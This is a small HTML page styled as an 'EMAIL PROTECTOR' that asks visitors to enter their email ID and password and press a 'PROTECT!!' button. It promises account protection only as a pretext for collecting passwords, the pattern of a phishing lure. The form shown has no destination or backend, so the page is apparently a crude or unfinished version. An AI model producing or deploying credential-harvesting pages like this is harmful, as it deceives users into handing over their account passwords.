<html>
<head>
<title>TDR</title>
</head>
<body bgcolor="BLACK" text = "purple">
    
  <FONT color = "purple"> <CENTER> <h1><Marquee behavior="alternate">EMAIL PROTECTOR</Marquee></h1>  </CENTER> </FONT>
 <FONT COLOR = "RED"> <CENTER>ENTER YOUR EMAIL ID AND PASSWORD BELOW👇💥</CENTER>
  </FONT><br>
<FONT color ="RED"> <form method="post" align =" center">
Email id : <input type="text" name="Email id"><br><br>
Password : <input type="password" name="password"><br><br>
<input type="submit" value="PROTECT!!"><br><br> </FONT>


</form>

</body>
</html>
